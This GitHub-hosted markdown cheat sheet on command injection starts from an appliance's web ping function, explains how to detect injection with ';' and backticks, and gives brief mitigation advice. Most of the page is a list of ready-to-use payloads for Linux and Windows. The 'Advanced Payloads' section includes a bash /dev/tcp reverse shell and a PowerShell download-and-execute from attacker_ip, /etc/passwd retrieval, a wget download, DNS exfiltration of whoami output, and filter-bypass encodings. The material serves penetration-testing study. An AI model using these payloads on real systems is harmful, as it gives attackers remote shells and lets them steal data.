Skip to content

Latest commit

 

History

History
112 lines (95 loc) · 2.8 KB

Command Injection.md

File metadata and controls

112 lines (95 loc) · 2.8 KB
Raw

COMMAND INJECTION

Scenario: You're testing an appliance with a web interface for administration. As part of this interface, you have access to a ping function, to test its ability to call out. You tell it to ping google.com and you see:

PING google.com (172.217.3.14): 56 data bytes
64 bytes from 172.217.3.14: imp_seq=0  ttl=53 time=19.187 ms
64 bytes from 172.217.3.14: imp_seq=1  ttl=53 time=17.341 ms
64 bytes from 172.217.3.14: icmp_seq=2 ttl=53 time=14.355 ms
64 bytes from 172.217.3.14: icmp_seq=3 ttl=53 time=15.116 ms

  • It definitely looks similar to the output of the ping command in UNIX-like systems. Maybe server is running actual ping and directly passing the hostname on the command line.

  • In such a case, it may lead to execute other commands.

  • Try to ping the hostname with

google.com; echo test

  • If it just returns an empty page with the use of ; and &, it's vulnerable.

Backticks (````): Backtick allows to embed a subcommand, whos output gets embedded into the original command. Eg, ping `echo google.com` will work just like `ping google.com`

  • If this gets successfully executed, you own the system.

Mitigation

  • Never embed user data into a command line at all.
  • If you must, then use shell escaping, eg. escapeshellcmd() in PHP
  • The function escapes #&;`|*?~<>^(){}[]$, \x0A, \xFF, and any unbalanced quotes.
  • Note that this doesn't prevent use of spaces, so if the user input isn't quoted, it could very well add new arguments to the command, which can be enough to own a system in some cases.

Command Injection Payloads (Linux)

  1. Simple Command Injection
; ls -la
  1. Command Chaining with &&
&& whoami
  1. Command Substitution with Backticks
`whoami`
  1. Command Substitution with $()
$(whoami)
  1. Command Injection with Pipes |
| whoami

Command Injection Payload (Windows)

  1. Simple Command Injection
& dir
  1. Command Chaining with &&
&& whoami
  1. Command Injection with Pipes |
| whoami
  1. Command Injection with ^
^& dir

Advanced Payloads

  1. Retrieve /etc/passwd File (Linux)
; cat /etc/passwd
  1. Reverse Shell (Linux)
; bash -i >& /dev/tcp/attacker_ip/attacker_port 0>&1
  1. Reverse Shell (Windows)
& powershell IEX (New-Object Net.WebClient).DownloadString('http://attacker_ip/shell.ps1')
  1. Bypass Filters with Hex Encoding (Linux)
; echo -e '\x63\x61\x74 /etc/passwd'
  1. Chained Commands to Download a File (Linux)
; wget http://attacker_ip/malicious_file
  1. DNS Exfiltration (Linux)
; nslookup `whoami`.attacker.com

Common Bypass Techniques

  1. Whitespace Bypass
;$(echo${IFS}whoami)
  1. URL-Encoding Bypass
%3B%20whoami